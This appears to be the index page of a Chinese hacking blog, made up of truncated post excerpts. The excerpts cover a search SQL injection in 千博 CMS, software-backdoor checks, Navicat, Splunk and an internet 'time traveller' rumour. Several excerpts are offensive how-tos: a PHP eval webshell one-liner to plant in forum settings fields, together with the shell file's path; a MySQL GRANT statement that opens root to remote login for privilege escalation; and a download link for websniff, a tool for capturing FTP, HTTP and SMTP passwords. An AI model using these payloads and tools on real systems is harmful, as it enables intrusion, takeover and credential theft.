黑面小窝

希望多花点时间再学习下吧 大体看了下感觉应该是WEB安全测试这本内容好点，等看完再具体推荐吧

More...

千博企业网站管理系统v2010 Build 0716

漏洞描述：搜索型注入漏洞

默认后台地址：http://127.1/system/Admin_Login.Asp

漏洞分析:Search.Asp

Function WebLocation()
WebLocation = "搜索 - "&vbCrLf
If request("Range") = "Void" Then

More...

More...

作者：wǒ澷游zhě

现在网络上的东西愈来愈不可信了。
不论下载什么工具都得多个心眼，特别是经常玩黑的朋友。
俗话说：常在河边走，哪有不湿鞋。弄不好哪天自己就中招了。
下面我就简单分析下，如何判断软件是否有后门。

我把软件分为两大类：1.非黑客系列软件（播放器、即时聊天工具）  
                                     2.黑客系列软件（例如：啊D、S扫描器、外挂等）

More...

常规设置：站点地址和管理员邮箱处插入代码

站点地址：http://''''''''''''''<?php eval($_POST[cmd])?>'''''''''''''''''''''\\

管理员邮箱：''''''''''''''<?php eval($_POST[cmd])?>'''''''''''''''''''''\\

提交一句话连接：data\bbscache\admin_record.php
 

如果遇到了 服务器开启了 3306 端口，但是不允许root外连的情况，我们可以在shell里面执行如下的语句来开启root用户的外连，方便我们提权。

GRANT ALL PRIVILEGES ON *.* TO ‘root’@'%’ IDENTIFIED BY ‘root密码’ WITH GRANT OPTION;

转自:独自等待博客

软件简介：Navicat导航貓是一个强大的MySQL数据库管理和开发工具。Navicat导航貓为专业开发者提供了一套强大的足够尖端的工具，但它对于新用户仍然是易于学习。Navicat,使用了极好的图形用户界面（GUI），可以让你用一种安全和更为容易的方式快速和容易地创建、组织、存取和共享信息。

More...

        Splunk 是一个日志分析软件.与 Google Analytics 这一类的 Web 日志分析软件的不同之处在于，Splunk 可以支持任何服务器产生的日志，其对日志进行处理的方式是进行高效索引之后让管理员可以对日志中出现的各种情况进行搜索，并且通过非常好的图形化的方式展现出来。 Splunk 使用了IT搜索引擎，它可以实时搜寻、浏览、警示及报告您所有的IT数据，包括记录文件、组态、讯息、捕捉讯号及警示、脚本、程序代码、计量单位及更多数据。只要是您IT设备机器所产生的数据，Splunk就能加以消化。 每天由各种服务器所产生的日志的数量是非常惊人的，而遇到突发情况时，却往往能够从这些海量日志中找到最多的有用消息。通常在 Unix 下对日志进行查找使用的是 grep 之类的低效率的方式，而 Splunk 使用了现代搜索引擎技术对日志进行搜索，同时提供了一个非常强大的 AJAX 式的界面展现日志。

More...

Author: 木瓜

下载地址：http://www.cncert.net/up_files/soft/websniff1.0.rar


Websniff 1.0 是user权限的 rawsocket sniff，可以截取ftp,http,smtp ...等密码，在渗透过程中绝对实用的工具。cncert网站发布的websniff需要 .net 2.0，客户端用firefox，如果用IE会让你错过一个参数设置。

More...

近日网上红着这样一位哥，大家都尊称他为未来哥。

百度贴吧是一个简易而不简单的论坛系统，里面有一个贴吧就叫做 2012 贴吧。2010年6月13日中午，一个ID为“X来自未来”的网友在 2012 贴吧发表了一个当时不是很起眼的帖子，名为《来自不远的将来，愿意了解的请进》。X来自未来在他的帖子里说：

我来自不远的未来，我知道很多人只会把我的话当是个玩笑，我愿意先给大家一点事实的证据。

我给出的的证据很简单，目前世界最关注的世界杯，决赛双方将是荷兰和西班牙，荷兰2：1战胜了西班牙，斯内德和另一个你们猜不出的替补球员进了球。希望我的这番话不要在世界杯决赛前传到南非，否则我担心球员心态受影响，从而改变了历史。

...

More...